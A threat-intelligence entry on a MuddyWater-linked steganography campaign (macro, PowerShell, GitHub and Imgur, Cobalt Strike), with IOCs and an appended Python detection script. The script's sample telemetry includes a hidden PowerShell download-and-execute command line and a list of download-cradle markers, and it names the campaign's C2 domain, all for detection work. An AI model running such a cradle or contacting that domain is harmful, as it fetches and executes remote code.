Threats Feed | MuddyWater | Last Updated: 30/05/2025 | Author: Certfa Radar | Publish Date: 28/12/2020

MuddyWater APT Group Linked to Steganography-Based Malware Attack

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Downloader, Dropper, Malicious Macro, RAT
  • Attack Complexity: Medium
  • Threat Risk: Unknown

Threat Overview

A new malware strain, potentially linked to the MuddyWater APT group, uses Word files with macros to deploy PowerShell scripts from GitHub, which then download an image from Imgur. The image's pixel values decode a Cobalt Strike payload. This method, involving steganography, enables attackers to execute commands and establish remote control over Windows systems. The attack primarily targets Middle Eastern entities, using phishing emails to distribute malicious Word documents.

Detected Targets

Type    | Description            | Confidence
Region  | Middle East Countries  | High

Extracted IOCs

  • mazzion1234-44451.portmap[.]host
  • 97b5ca432a34b919a59fe8bc8e213fc3
  • a9506c371418969ea5084b00db54573b
  • 1fb678ab15f3c311d7189d4c80bc7c91bc360e49
  • 6774f7b5e533a4158b2b2375cf06fbc95e434526
  • d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
  • ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866

Tip: 7 related IOCs (0 IP, 1 domain, 0 URL, 0 email, 6 file hash) to this threat have been found.

FAQs

Malware Hiding in Plain Sight: GitHub, Imgur, and Stealthy Attacks

A sophisticated malware campaign used Word documents with macros to run malicious scripts that downloaded a hidden attack payload from a seemingly harmless image on Imgur.

The campaign is believed to be linked to MuddyWater, a known government-backed hacking group that has previously targeted organizations in the Middle East.

The attackers aimed to secretly install a remote access tool (Cobalt Strike) that allows full control of infected computers for spying, data theft, or further attacks.

Victims were tricked into opening Word documents. These documents executed scripts that pulled an image from Imgur. Hidden inside the image’s pixels was code that activated the attack.

While no specific victims were named, the methods and suspected actor suggest targets of interest were likely in the Middle East, including government or strategic sectors.

Because GitHub and Imgur are trusted platforms, using them to host the script and the image helps attackers hide in normal traffic and avoid raising alarms in security systems.

Avoid opening suspicious Word documents, especially those prompting to enable macros. Keep security tools updated and monitor for unusual activity like PowerShell scripts contacting external servers.
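The following is an added detection example illustrating the monitoring advice above and the attack chain in the Threat Overview (Word macro, then PowerShell fetching a script from GitHub and an image from Imgur, then command-and-control). It is not part of the Certfa Radar entry and is not MuddyWater's or Certfa's code. It assumes simplified Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records; all event data, paths and the GitHub URL are constructed sample values, except the portmap domain, which is the domain IOC listed on this page.

```python
"""Flag the macro -> PowerShell -> GitHub/Imgur -> C2 chain in endpoint telemetry.

Added example code, not Certfa Radar's or MuddyWater's. Events below are
constructed to resemble Sysmon Event ID 1 (process create) and 3 (network).
"""
from collections import Counter
from typing import Dict, List

# Constructed sample telemetry (not real logs). Timestamps are illustrative.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS: List[Dict] = [
    {"ts": "2020-12-28T09:00:01", "id": 1, "pid": 4120, "ppid": 3001,
     "image": WINWORD, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": '"WINWORD.EXE" /n invoice.docm'},
    # Word spawning a hidden PowerShell with a download cradle (hypothetical URL).
    {"ts": "2020-12-28T09:00:07", "id": 1, "pid": 4388, "ppid": 4120,
     "image": POWERSHELL, "parent_image": WINWORD,
     "cmdline": "powershell.exe -w hidden -ep bypass IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/example/example/main/stage.ps1')"},
    {"ts": "2020-12-28T09:00:09", "id": 3, "pid": 4388, "image": POWERSHELL,
     "dest_host": "raw.githubusercontent.com", "dest_port": 443},
    {"ts": "2020-12-28T09:00:12", "id": 3, "pid": 4388, "image": POWERSHELL,
     "dest_host": "i.imgur.com", "dest_port": 443},
    # Domain IOC from this page used as the C2 destination.
    {"ts": "2020-12-28T09:00:20", "id": 3, "pid": 4388, "image": POWERSHELL,
     "dest_host": "mazzion1234-44451.portmap.host", "dest_port": 443},
    # Benign control: an admin's PowerShell under cmd.exe also reaching GitHub.
    {"ts": "2020-12-28T09:05:00", "id": 1, "pid": 5200, "ppid": 2200,
     "image": POWERSHELL, "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"ts": "2020-12-28T09:05:03", "id": 3, "pid": 5200, "image": POWERSHELL,
     "dest_host": "raw.githubusercontent.com", "dest_port": 443},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings typical of in-memory download-and-execute one-liners.
DOWNLOAD_CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                           "iwr ", "net.webclient", "iex ", "invoke-expression")
# Public content hosts the chain abuses; benign on their own, suspicious from an Office child.
PUBLIC_CONTENT_HOSTS = {"raw.githubusercontent.com", "github.com", "i.imgur.com", "imgur.com"}
KNOWN_BAD_HOSTS = {"mazzion1234-44451.portmap.host"}  # domain IOC listed on this page


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Run four rules over the events and return one alert dict per hit."""
    alerts: List[Dict] = []
    procs: Dict[int, Dict] = {}  # pid -> its process-creation event
    for e in events:
        if e["id"] == 1:
            procs[e["pid"]] = e
            child, parent = basename(e["image"]), basename(e["parent_image"])
            if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
                alerts.append({"rule": "office_spawned_script_host", "pid": e["pid"],
                               "detail": f"{parent} -> {child}"})
            cmd = e["cmdline"].lower()
            if child in SCRIPT_HOSTS and any(m in cmd for m in DOWNLOAD_CRADLE_MARKERS):
                alerts.append({"rule": "powershell_download_cradle", "pid": e["pid"],
                               "detail": e["cmdline"]})
        elif e["id"] == 3:
            host = e["dest_host"].lower()
            if host in KNOWN_BAD_HOSTS:
                alerts.append({"rule": "known_c2_domain", "pid": e["pid"], "detail": host})
            proc = procs.get(e["pid"])
            # Correlate: a script host whose parent is an Office app reaching public content hosts.
            if proc and basename(proc["parent_image"]) in OFFICE_APPS and host in PUBLIC_CONTENT_HOSTS:
                alerts.append({"rule": "office_child_fetching_public_content",
                               "pid": e["pid"], "detail": host})
    return alerts


def summarize(alerts: List[Dict]) -> Dict[str, int]:
    """Count alerts per rule name."""
    return dict(Counter(a["rule"] for a in alerts))


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] pid={a['pid']} {a['detail']}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

The benign control events show why the correlation matters: PowerShell reaching GitHub is routine on administrator workstations, so the public-content rule only fires when the process tree leads back to an Office application, while the known-domain rule fires regardless of parent. Only the Word-spawned process (pid 4388) is flagged in the sample data.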

It appears to be a targeted attack, but the techniques used could be replicated by others, making it a broader concern for any organization handling sensitive data.